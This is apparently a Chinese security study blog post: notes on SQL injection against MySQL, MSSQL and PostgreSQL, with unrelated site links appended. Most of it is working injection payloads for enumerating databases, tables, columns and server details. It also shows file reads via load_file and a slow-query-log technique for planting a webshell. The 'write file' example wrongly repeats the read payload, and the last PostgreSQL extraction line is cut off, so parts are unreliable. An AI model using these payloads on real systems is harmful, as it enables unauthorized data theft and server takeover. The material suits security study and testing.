网络安全之攻防笔记--通用漏洞SQL注入之MySQL&mssql&postgresql

Dawndddddd2025-02-19 22:08

  • 通用漏洞SQL注入之mysql&h&mssql&postgresql

    • mysql数据库

      • root高权限读写注入

        • 读取文件
          • UNION SELECT 1,load_file('d:/w.txt'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
        • 写入文件
          • UNION SELECT 1,load_file('d:/w.txt'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
        • 路径获取
          • phpinfo,报错,字典等

        • 无法写入

          • secure_file_priv 突破 注入中需要支持 SQL 执行环境,没有就需要借助 phpmyadmin 或能够直接连上对方数据库进行绕过
          • set global slow_query_log=1
          • set global slow_query_log_file='shell 路径';
          • select '' or SLEEP(1);
    • mssql数据库

      • 高权限读写注入

        • 可以执行系统命令、读写文件操作

        • 测列数

          • ORDER BY 4
          • AND 1=2 UNION SELECT NULL,NULL,NULL,NULL
        • 测显位
          • AND 1=2 UNION SELECT NULL,'NULL',NULL,NULL

        • 获取信息

          • AND 1=2 UNION SELECT NULL,@@VERSION,NULL,NULL
          • AND 1=2 UNION SELECT NULL,SUSER_NAME(),NULL,NULL
          • AND 1=2 UNION SELECT NULL,DB_NAME(),NULL,NULL
        • 获取数据库名
          • AND 1=2 UNION SELECT NULL,name,NULL,NULL FROM master..sysdatabases
        • 获取表名
          • AND 1=2 UNION SELECT NULL,name,NULL,NULL FROM sysobjects WHERE xtype='U'
        • 获取数据
          • AND 1=2 UNION SELECT NULL,column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'
    • postgresql数据库

      • 高权限读写注入

        • 测列数

          • order by 4
          • and 1=2 union select null,null,null,null

        • 测显位:第2,3

          • and 1=2 union select 'null',null,null,null 错误
          • and 1=2 union select null,'null',null,null 正常
          • and 1=2 union select null,null,'null',null 正常
          • and 1=2 union select null,null,null,'null' 错误

        • 获取信息

          • and 1=2 UNION SELECT null,version(),null,null
          • and 1=2 UNION SELECT null,current_user,null,null
          • and 1=2 union select null,current_database(),null,null
        • 获取数据库名:
          • and 1=2 union select null,string_agg(datname,','),null,null from pg_database

        • 获取表名

          • 1、and 1=2 union select null,string_agg(tablename,','),null,null from pg_tables where schemaname='public'
          • 2、and 1=2 union select null,string_agg(relname,','),null,null from pg_stat_user_tables
        • 获取数据
          • and 1=2 union select

    • 另外

      • access无高权限注入点--只能猜解,还是暴力猜解
      • MySQL,postgresql,mssql高权限注入点-可升级读写执行
相关推荐
草莓熊Lotso33 分钟前
《算法闯关指南:动态规划算法--斐波拉契数列模型》--01.第N个泰波拉契数,02.三步问题
开发语言·c++·经验分享·笔记·其他·算法·动态规划
草莓熊Lotso1 小时前
Git 分支管理:从基础操作到协作流程(本地篇)
大数据·服务器·开发语言·c++·人工智能·git·sql
q***33374 小时前
oracle 12c查看执行过的sql及当前正在执行的sql
java·sql·oracle
7***99876 小时前
GaussDB数据库中SQL诊断解析之配置SQL限流
数据库·sql·gaussdb
FFF团团员9097 小时前
树莓派学习笔记3:LED和Button
笔记·学习
碧海潮生_CC8 小时前
【CUDA笔记】04 CUDA 归约, 原子操作,Warp 交换
笔记·cuda
5***o5009 小时前
PHP在电商中的支付集成
sql·ue5·rizomuv
摇滚侠9 小时前
2025最新 SpringCloud 教程,从单体到集群架构,笔记02
笔记·spring cloud·架构
风123456789~9 小时前
【OceanBase专栏】OB背景知识
数据库·笔记·oceanbase
智者知已应修善业11 小时前
【51单片机普通延时奇偶灯切换】2023-4-4
c语言·经验分享·笔记·嵌入式硬件·51单片机
热门推荐
01GitHub 镜像站点02【保姆级教程】免费使用Gemini3的5种方法!免翻墙/国内直连03BongoCat - 跨平台键盘猫动画工具04UV安装并设置国内源05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06Linux下V2Ray安装配置指南07Google Antigravity:无法登录?早期错误、登录修复和用户反馈指南08全球最强模型Grok4,国内已可免费使用!(附教程)09Labelme从安装到标注:零基础完整指南1046个Nano-banana 精选提示词,持续更新中